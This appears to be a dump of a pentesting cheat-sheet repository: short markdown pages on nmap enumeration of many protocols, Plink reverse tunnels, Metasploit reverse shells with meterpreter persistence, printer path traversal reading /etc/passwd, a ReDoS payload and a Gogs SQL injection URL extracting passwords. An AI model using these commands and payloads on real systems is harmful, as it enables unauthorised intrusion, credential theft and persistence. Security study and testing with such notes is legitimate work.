3 | description: ARP is used to find another computer’s MAC address based on its IP address.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Basic Flow
12 |
13 | 1. **Check Interface and Gateway IP Address**
14 |
15 | ```sh
16 | # Interfaces
17 | ip addr
18 |
19 | # Default gateway
20 | ip route list
21 | ```
22 |
23 | 2. **Scan the Network to Find Target IP**
24 |
25 | ```sh
26 | nmap -sP /24
27 | nmap -sP /16
28 | ```
29 |
30 | 3. **Enable IP Forwarding**
31 |
32 | ```sh
33 | # Allow all forwading in the LAN
34 | # -A: append rules
35 | # -i: interface
36 | # -j: jump
37 | iptables -A FORWARD -i eth0 -j ACCEPT
38 | ```
39 |
40 |
41 |
42 | ## Find MAC Address
43 |
44 | ```sh
45 | cat /sys/class/net/eth0/address
46 | cat /sys/class/net/enp0s3/address
47 | cat /sys/class/net/tun0/address
48 | ```
--------------------------------------------------------------------------------
/src/exploit/network/attack/_data.yml:
--------------------------------------------------------------------------------
1 | category2: attack
--------------------------------------------------------------------------------
/src/exploit/network/eternetip-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: EthernetIP Pentesting
3 | description: EtherNet/IP is an industrial network protocol that adopts the Common Industrial Protocol to standart Ethernet. A default port is 44818.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-01-27
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script enip-info -p 44818
15 | ```
--------------------------------------------------------------------------------
/src/exploit/network/firewall.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Firewall
3 | description: It's a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-11
8 | draft: false
9 | ---
10 |
11 | ## Status
12 |
13 | ```sh
14 | ufw status
15 | ufw status verbose
16 | ```
17 |
18 |
19 |
20 | ## Enable/Disable the Firewall
21 |
22 | ```sh
23 | ufw enable
24 |
25 | ufw disable
26 | ```
27 |
28 |
29 |
30 | ## Set Default Policies
31 |
32 | ```sh
33 | # Allow all
34 | ufw default ALLOW
35 |
36 | # Deny all
37 | ufw default DENY
38 | ```
39 |
40 |
41 |
42 | ## Rules
43 |
44 | - **Allow**
45 |
46 | ```sh
47 | ufw allow 22
48 | ufw allow 22/tcp
49 | ufw allow 80
50 | ufw allow 80/tcp
51 |
52 | # Allow the given ip address access to port 22 for all protocols
53 | ufw allow from to any port 22
54 | ```
55 |
56 | - **Deny**
57 |
58 | ```sh
59 | ufw deny 22
60 | ufw deny 22/tcp
61 | ufw deny 80
62 | ufw deny 80/tcp
63 | ```
--------------------------------------------------------------------------------
/src/exploit/network/grpc-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: gRPC Pentesting
3 | description: gRPC is a cross-platform open source high performance remote procedure call framework. Default ports are 80, 443 and the official docs example use 50051 port.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-05-28
8 | draft: false
9 | ---
10 |
11 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui)
12 |
13 | **`grpcui`** is an interactive web UI for **gRPC**.
14 | If you don’t have `grpcui`, you need to install it.
15 |
16 | ```bash
17 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest
18 | ```
19 |
20 | Then we can interact with gRPC.
21 |
22 | ```bash
23 | grpcui -plaintext example.com:9019
24 | ```
--------------------------------------------------------------------------------
/src/exploit/network/port-forwarding/_data.yml:
--------------------------------------------------------------------------------
1 | category2: port-forwarding
--------------------------------------------------------------------------------
/src/exploit/network/port-forwarding/port-forwarding-with-plink.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Port Forwarding with Plink
3 | description: Plink is a Windows command line version of the PuTTY SSH client.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-03-19
8 | draft: false
9 | ---
10 |
11 | ## Reverse Connection
12 |
13 | ### 1. Open Lisnter in Your Local Machine
14 |
15 | ```sh
16 | nc -lvnp 4444
17 | ```
18 |
19 | ### 2. Run Reverse Connection in Target Machine
20 |
21 | First of all, generate SSH keys. Two keys (public and private) will be generated.
22 |
23 | ```sh
24 | ssh-keygen
25 | ```
26 |
27 | Convert the private key for Windows.
28 |
29 | ```sh
30 | puttygen private_key -o private_key.ppk
31 | ```
32 |
33 | Run reverse connection using plink.
34 |
35 | ```powershell
36 | cmd.exe /c echo y | .\plink.exe -R :: attacker@ -i private_key.ppk -N
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/_data.yml:
--------------------------------------------------------------------------------
1 | category2: protocol
--------------------------------------------------------------------------------
/src/exploit/network/protocol/dhcp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: DHCP (Dynamic Host Configuration Protocol) Pentesting
3 | description: DHCP uses UDP. Port 67 is for a server, port 68 is for a client.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-10
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script broadcast-dhcp-discover -p 67,68
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/irc-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IRC (Internet Relay Chat) Pentesting
3 | description: IRC is a protocol that allows the communication in the form of text between multiple parties. Default ports are 194,6667.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-02-26
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/memcache-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Memcache Pentesting
3 | description: Memcached is a general-purpose distributed memory caching system. A default port is 11211.
4 | tags:
5 | - Web
6 | refs:
7 | - https://book.hacktricks.xyz/network-services-pentesting/11211-memcache
8 | date: 2023-02-23
9 | draft: false
10 | ---
11 |
12 | ## Communication
13 |
14 | We can communicate with memcache server using Netcat.
15 |
16 | ```bash
17 | nc -vn 11211
18 | Connection to 11211 port [tcp/*] succeeded!
19 |
20 | # Commands in nc
21 | version
22 | stats
23 | stats slabs
24 | stats items
25 | stats cachedump 0
26 | stats cachedump 1 0
27 | get
28 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/modbus-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Modbus Pentesting
3 | description: Modbus is a data communications protocol. A default port is 502.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-01-06
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/ntp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NTP (Network Time Protocol) Pentesting
3 | description: NTP is a networking protocol for clock synchronization between computer systems over packet-switched. Default port is 123. It uses UDP.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script ntp-info -p 123
15 | nmap -sU --script ntp-monlist -p 123
16 | nmap -sU --script ntp* -p 123
17 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123
18 | ```
19 |
20 | ### Ntpq
21 |
22 | ```sh
23 | ntpq -c readlist
24 | ntpq -c readvar
25 | ntpq -c peers
26 | ntpq -c associations
27 | ntpdc -c monlist
28 | ntpdc -c listpeers
29 | ntpdc -c sysinfo
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/pptp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PPTP Pentesting
3 | description: PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. A default port is 1723.
4 | tags:
5 | - SSH
6 | refs:
7 | - https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a-
8 | date: 2023-10-05
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```bash
15 | nmap --script pptp-version -p 1723
16 | ```
17 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/telnet-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Telnet Pentesting
3 | description: Telnet is an application protocol used on the internet or local area network. A default port is 23.
4 | tags:
5 | - Network
6 | - Telnet
7 | refs:
8 | date: 2023-10-30
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script telnet-encryption -p 23
16 | nmap --script telnet-ntlm-info -p 23
17 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23
18 | ```
19 |
20 |
21 |
22 | ## Configuration Files
23 |
24 | ```bash
25 | cat /etc/inetd.conf
26 | # or
27 | cat /etc/xinetd.d/telnet
28 | ```
29 |
30 |
31 |
32 | ## Connect
33 |
34 | ```sh
35 | telnet
36 | telnet 23
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/tftp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: TFTP (Trivial File Transfer Protocol) Pentesting
3 | description: TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. A default port is 69.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-10-30
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script tftp-enum -p 69
15 | ```
16 |
17 |
18 |
19 | ## Configuration Files
20 |
21 | ```bash
22 | cat /etc/inetd.conf
23 | # or
24 | cat /etc/xinetd.d/tftp
25 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/upnp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: UPnP (Universal Plug and Play) Pentesting
3 | description: UPnP is a network protocol that allow devices to discover and interact with each other seamlessly over a local network. Default ports are 1900(UDP) and 5000 (TCP).
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-02-25
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap -sU --script upnp-info -p 1900
15 | nmap --script upnp-info -p 5000
16 | nmap --script broadcast-upnp-info -p 1900
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/waste-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: WASTE Pentesting
3 | description: A peer-to-peer and end-to-end protocol and software application. The ports often used are 1337, 31337.
4 | tags:
5 | - Network
6 | refs:
7 | dates: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Connect
12 |
13 | ```sh
14 | connect 1337
15 | # or
16 | nc 1337
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/redos.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ReDoS (Regular Expression Denial of Service)
3 | description: ReDOS is an attack method to compromise the Regex vulnerabilities which evaluate arbitrary inputs.
4 | tags:
5 | - Network
6 | refs:
7 | - https://en.wikipedia.org/wiki/ReDoS#Examples
8 | - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
9 | date: 2023-10-12
10 | draft: false
11 | ---
12 |
13 | ## Evil (Vulnerable) Regex
14 |
15 | ```html
16 | (a+)+
17 | ([a-zA-Z]+)*
18 | (a|aa)+
19 | (a|a?)+
20 | (.*a){x} for x \> 10
21 | ^(([a-z])+.)+[A-Z]([a-z])+$
22 |
23 |
24 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/
25 | ```
26 |
27 |
28 |
29 | ## Malicious Input
30 |
31 | If a target website validates user input with the above vulnerable Regex, we may be able to compromise the target system by the following malicious input:
32 |
33 | ```bash
34 | aaaaaaaaaaaaaaaaaaaaaaaa!
35 | ```
36 |
--------------------------------------------------------------------------------
/src/exploit/network/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tool
--------------------------------------------------------------------------------
/src/exploit/network/tool/decrypt-putty-sessions-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Decrypt SolarPuTTY Sessions Files
3 | description:
4 | tags:
5 | - Network
6 | refs:
7 | date: 2024-12-06
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5)
14 |
15 | ```sh
16 | python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/vpn/_data.yml:
--------------------------------------------------------------------------------
1 | category2: vpn
--------------------------------------------------------------------------------
/src/exploit/network/vpn/ipsec-vpn-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IPsec VPN Pentesting
3 | description: IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in VPN (Virtual Private Network). Default ports are 443 (SSL), 500 (IPSec).
4 | tags:
5 | - VPN
6 | refs:
7 | date: 2022-12-26
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap --script http-cisco-anyconnect -p 443
15 | nmap --script ike-version -p 500
16 | ```
--------------------------------------------------------------------------------
/src/exploit/network/wifi/_data.yml:
--------------------------------------------------------------------------------
1 | category2: wifi
--------------------------------------------------------------------------------
/src/exploit/network/wifi/wifi-password-recovery.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: WiFi Password Recovery
3 | description: If we forget WiFi password, we may be able to recover password from the history.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-07-15
8 | draft: false
9 | ---
10 |
11 | ## Windows
12 |
13 | Open Command Prompt as Administrator and then execute the following commands:
14 |
15 | ```sh
16 | # Show all network names you've accessed and saved
17 | netsh wlan show profile
18 |
19 | # Show the details of the specific network including password
20 | netsh wlan show profile name="network-name" key=clear
21 | ```
22 |
23 |
24 |
25 | ## Linux
26 |
27 | ```sh
28 | ls -al /etc/NetworkManager/system-connections/
29 | cat /etc/NetworkManager/system-connections/example.nmconnection
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/printer/_data.yml:
--------------------------------------------------------------------------------
1 | category1: printer
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/printer/raw-printing-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Raw Printing Pentesting
3 | description: PLJ (Printer Job Languages) is a method for switching printer languages. A default port is 9100.
4 | tags:
5 | - Printer
6 | refs:
7 | - https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf
8 | - https://book.hacktricks.xyz/network-services-pentesting/9100-pjl
9 | date: 2023-07-19
10 | draft: false
11 | ---
12 |
13 | ## Enumeration
14 |
15 | ```sh
16 | nmap --script pjl-ready-message -p 9100
17 | ```
18 |
19 |
20 |
21 | ## Connect
22 |
23 | ```bash
24 | nc 9100
25 | ```
26 |
27 |
28 |
29 | ## Commands
30 |
31 | ```bash
32 | # See printer information
33 | @PJL INFO STATUS
34 | @PJL INFO ID
35 | @PJL INFO PRODINFO
36 |
37 | # See directories in the system
38 | @PJL FSDIRLIST NAME="0:" ENTRY=1
39 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1
40 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1
41 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
42 |
43 | # See contents of a file
44 | @PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1
45 | ```
--------------------------------------------------------------------------------
/src/exploit/privacy/_data.yml:
--------------------------------------------------------------------------------
1 | category1: tor
2 | related_menus:
3 | - title: Tor
4 | id: tor
--------------------------------------------------------------------------------
/src/exploit/privacy/tor/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tor
--------------------------------------------------------------------------------
/src/exploit/quantum/_data.yml:
--------------------------------------------------------------------------------
1 | category1: quantum
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/quantum/read-qasm.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Read QASM
3 | description: QASM (Quantum Assembly Language) is a language used to program quantum computers. It is similar in concept to assembly language used in classical computers, but instead of operating on bits, QASM operates on quantum bits (qubits).
4 | tags:
5 | - Quantum
6 | refs:
7 | - https://github.com/Taoudi/Cyber_Apocalypse/blob/main/HTB.ipynb
8 | date: 2023-03-26
9 | draft: false
10 | ---
11 |
12 | ## Install Qiskit
13 |
14 | ```python
15 | pip install oqi qiskit
16 | ```
17 |
18 |
19 |
20 | ## Read QASM
21 |
22 | ```python
23 | from qiskit import QuantumCircuit, transpile
24 | from qiskit.providers.aer import QasmSimulator
25 | from qiskit.visualization import plot_histogram
26 |
27 | simulator = QasmSimulator()
28 | circuit = QuantumCircuit.from_qasm_file('example.qasm')
29 | compiled_circuit = transpile(circuit, simulator)
30 | job = simulator.run(compiled_circuit, shots=1000)
31 | result = job.result()
32 |
33 | counts = result.get_counts(compiled_circuit)
34 | print(counts)
35 | ```
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/_data.yml:
--------------------------------------------------------------------------------
1 | category1: reconnaissance
2 | related_menus:
3 | - title: OSINT
4 | id: osint
5 | - title: Search Technique
6 | id: search-technique
7 | - title: Network
8 | id: network
9 | - title: Subdomain
10 | id: subdomain
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/network/_data.yml:
--------------------------------------------------------------------------------
1 | category2: network
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/osint/_data.yml:
--------------------------------------------------------------------------------
1 | category2: osint
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/search-technique/_data.yml:
--------------------------------------------------------------------------------
1 | category2: search-technique
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/search-technique/shodan-dorks.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Shodan Dorks
3 | description: Shordan is a search engine which allows us to find various types of servers by filters. This page gives ways to search specific information.
4 | tags:
5 | - OSINT
6 | - Reconnaissance
7 | refs:
8 | - https://systemweakness.com/how-to-find-open-elasticsearch-databases-using-shodan-fb9314af604a
9 | date: 2023-07-14
10 | draft: false
11 | ---
12 |
13 | ```bash
14 | product:elastic port:9200 country:us
15 | product:postgresql port:5432 country:jp
16 |
17 | # Search 'users' column
18 | proudct:elastic port:9200 users
19 | ```
20 |
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/subdomain/_data.yml:
--------------------------------------------------------------------------------
1 | category2: subdomain
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/_data.yml:
--------------------------------------------------------------------------------
1 | category1: reverse-engineering
2 | related_menus:
3 | - title: Assembly
4 | id: assembly
5 | - title: Cheatsheet
6 | id: cheatsheet
7 | - title: Reversing
8 | id: reversing
9 | - title: Debugger
10 | id: debugger
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/assembly/_data.yml:
--------------------------------------------------------------------------------
1 | category2: assembly
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/cheatsheet/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cheatsheet
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/debugger/_data.yml:
--------------------------------------------------------------------------------
1 | category2: debugger
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/debugger/gdbserver-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: GdbServer Pentesting
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-07-17
8 | draft: false
9 | ---
10 |
11 | ## Reverse Shell with Metasploit
12 |
13 | ```bash
14 | msfconsole
15 | msf> use exploit/multi/gdb/gdb_server_exec
16 | msf> set payload linux/x64/meterpreter/reverse_tcp
17 | msf> set rhost
18 | msf> set rport
19 | msf> set lhost
20 | msf> set lport
21 | msf> run
22 | ```
23 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/_data.yml:
--------------------------------------------------------------------------------
1 | category2: reversing
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-elf.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing ELF (Executable and Linking Format)
3 | description: ELF is a file format for executables of Linux.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Static Analysis
12 |
13 | ```sh
14 | # -a: All
15 | readelf ./sample -a
16 | # -p: Dump the contents of section
17 | readelf ./sample -p .data
18 | readelf ./sample -p .text
19 | readelf ./sample -p .interp
20 |
21 | # Change MSB <=> LSB by editing binary number.
22 | hexedit ./sample
23 | (MSB) 7F 45 4C 46 02 02 01 ... <=> (LSB) 7F 45 4C 46 02 01 01 ...
24 |
25 | # Display shared object dependencies
26 | ldd ./sample
27 | ```
28 |
29 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-jar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing JAR File
3 | description: JAR (Java Archive) file can be reversed using some tools.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Code Analysis
12 |
13 | We can use **`jdgui`** GUI tool.
14 |
15 | ```sh
16 | jd-gui
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-ole.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing OLE
3 | description: OLE is a mechanism that allows users to create and edit documents containing items or "objects" created by multiple applications.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Oledump
12 |
13 | It dumps the information of the OLE files.
14 |
15 | ```sh
16 | oledump.py example.doc
17 |
18 | # -s: stream number to analyze
19 | # -d: dump
20 | oledump.py -s 8 -d example.doc
21 | oledump.py -s 9 -d example.doc
22 | ```
23 |
24 | Then decrypt the output using online tools like CyberChef.
25 |
26 |
27 |
28 | ## Olevba
29 |
30 | Download the **[Oletools](https://github.com/decalage2/oletools)** to use it.
31 |
32 | ```sh
33 | olevba example.docm
34 | ```
35 |
36 | Copy the above Visual Basic code, and access to **[OneCompiler](https://onecompiler.com/)**.
37 | Select the programming language "Visual Basic".
38 | Paste the copied code to the editor, then click Run.
39 |
40 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-pyc.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing PYC (Python Compiled File)
3 | description: A PYC file is a compiled file generated from source code written in Python.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-18
8 | draft: false
9 | ---
10 |
11 | ## Decompile
12 |
13 | [uncompyle6](https://github.com/rocky/python-uncompyle6/) is a PYC decompiler.
14 |
15 | We can install easily using pip.
16 |
17 | ```bash
18 | pip install uncompyle6
19 | ```
20 |
21 | Then decompile the pyc file.
22 |
23 | ```bash
24 | uncompyle6 example.pyc
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/shell/_data.yml:
--------------------------------------------------------------------------------
1 | category1: shell
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/shell/reverse-shell-with-pwncat.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reverse Shell with Pwncat
3 | description: Pwncat is a reverse and bind shell handler.
4 | tags:
5 | - Privilege Escalation
6 | - Reverse Shell
7 | - Windows
8 | refs:
9 | date: 2023-12-23
10 | draft: false
11 | ---
12 |
13 | It can be downloaded from [here](https://pwncat.org/).
14 | For listening from remote connection, run the following command.
15 |
16 | ```bash
17 | pwncat-cs -lp 4444
18 |
19 | # For Windows target
20 | pwncat-cs -m windows -lp 4444
21 | ```
22 |
23 |
24 |
25 | ## Commands
26 |
27 | After reverse connecting, we can execute commands either local or remote.
28 |
29 | ```bash
30 | # Switch between Local and Remote shell
31 | Ctrl+D
32 |
33 | # Upload a file to target machine (e.g. upload example.txt from local to remote)
34 | (local) upload ./example.txt /tmp/example.txt
35 | ```
--------------------------------------------------------------------------------
/src/exploit/shell/upgrade-to-fully-interactive-tty.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Upgrade to Fully Interactive TTY
3 | description: After reverse shell, the shell has poorly functions, so we can upgrade to more functional shell.
4 | tags:
5 | - Privilege Escalation
6 | - Reverse Shell
7 | refs:
8 | date: 2023-04-08
9 | draft: false
10 | ---
11 |
12 | ## Upgrade
13 |
14 | After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant.
15 |
16 | ```sh
17 | python3 -c 'import pty; pty.spawn("/bin/bash")'
18 | # or
19 | python -c 'import pty; pty.spawn("/bin/bash")'
20 | # or
21 | python2 -c 'import pty; pty.spawn("/bin/bash")'
22 | # or
23 | SHELL=/bin/bash script -q /dev/null
24 | ```
25 |
26 | The commands below make our shell even more perfect.
27 |
28 | ```sh
29 | Ctrl+z
30 | stty raw -echo;fg
31 | Enter x2
32 | export TERM=xterm
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/steganography/_data.yml:
--------------------------------------------------------------------------------
1 | category1: steganography
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/steganography/morse-image-reading.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Morse Image Reading
3 | description: If a picture is morse code, we can read it and translate to human readable strings.
4 | tags:
5 | - Steganography
6 | refs:
7 | - https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG
8 | date: 2023-07-14
9 | draft: false
10 | ---
11 |
12 | ## Morse OCR
13 |
14 | [morse-ocr](https://github.com/eauxfolles/morse-ocr) is an useful Python script to read and translate morse code from picture.
15 |
16 | ```bash
17 | python3 mocr.py example.png
18 | ```
19 |
--------------------------------------------------------------------------------
/src/exploit/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category1: tool
2 | related_menus:
3 | - title: Virtual Machine
4 | id: virtual-machine
5 | - title: Others
6 | id: others
--------------------------------------------------------------------------------
/src/exploit/tool/metasploit-cheat-sheets.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Metasploit Cheat Sheets
3 | description:
4 | tags:
5 | - Linux
6 | - Windows
7 | refs:
8 | date: 2023-01-07
9 | draft: false
10 | ---
11 |
12 | ## Msfconsole
13 |
14 | No content yet.
15 |
16 |
17 |
18 | ## Meterpreter
19 |
20 | ```sh
21 | # List all sessions running on background
22 | msf> sessions
23 |
24 | # Start interacting with the session
25 | msf> sessions
26 |
27 | # Drop into a system command shell
28 | meterpreter> shell
29 | # Upgrade to full functional shell
30 | python3 -c 'import pty;pty.spawn("/bin/bash")'
31 |
32 | # Persistence at the target system
33 | # -h: Help
34 | meterpreter> run persistence -h
35 | # -U: Automatically start when the user logs on
36 | # -i: The interal in seconds between each connection attempt
37 | # -p: The port on which the system running Metesploit is listening
38 | # -r: The IP of the system running Metasploit listening for the connect back
39 | meterpreter> run persistence -U -i 5 -p 443 -r
40 | ```
41 |
42 |
43 |
44 | ## Msfvenom
45 |
46 | No content yet.
47 |
--------------------------------------------------------------------------------
/src/exploit/tool/virtual-machine/_data.yml:
--------------------------------------------------------------------------------
1 | category2: virtual-machine
--------------------------------------------------------------------------------
/src/exploit/tool/virtual-machine/vm-escape.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: VM (Virtual Machine) Escape
3 | description:
4 | tags:
5 | - Virtual Machine
6 | refs:
7 | date: 2024-05-21
8 | draft: false
9 | ---
10 |
11 | ## Shared Folder
12 |
13 | If the VM admin sets a folder containing sensitive files as Shared Folder, we can get sensitive information by getting into the folder.
14 |
15 | ### VirtualBox
16 |
17 | ```bash
18 | # Linux
19 | cd /media/sf_
20 |
21 | # Windows
22 | cd \\VBOXSVR\\
23 | ```
24 |
25 | ### VMWare
26 |
27 | ```bash
28 | # Linux
29 | cd /mnt/vmhgs/
30 |
31 | # Windows
32 | cd \\vmware-host\Shared Folder\
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/version-control/_data.yml:
--------------------------------------------------------------------------------
1 | category1: version_control
2 | related_menus:
3 | - title: Git
4 | id: git
--------------------------------------------------------------------------------
/src/exploit/version-control/git/_data.yml:
--------------------------------------------------------------------------------
1 | category2: git
--------------------------------------------------------------------------------
/src/exploit/version-control/git/create-git-local-server.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Create Git Local Server
3 | description:
4 | tags:
5 | - Git
6 | refs:
7 | - https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols
8 | date: 2023-11-05
9 | draft: false
10 | ---
11 |
12 | ## Start Local Git Server (Dumb, HTTP)
13 |
14 | ```bash
15 | cd test_repo
16 | git init
17 | git add . && git commit -m "first commit"
18 | cd .git
19 | # Update auxiliary info file to help dumb server.
20 | # --bare: Bare repository (does not have a working directory)
21 | git --bare update-server-info
22 | cd ..
23 | python3 -m http.server
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/version-control/git/gogs-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gogs Pentesting
3 | description: Gogs (Go Git Service) is a painless self-hosted Git Service.
4 | tags:
5 | - Git
6 | - SQL Injection
7 | - Web
8 | refs:
9 | date: 2023-04-27
10 | draft: false
11 | ---
12 |
13 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238))
14 |
15 | ```txt
16 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
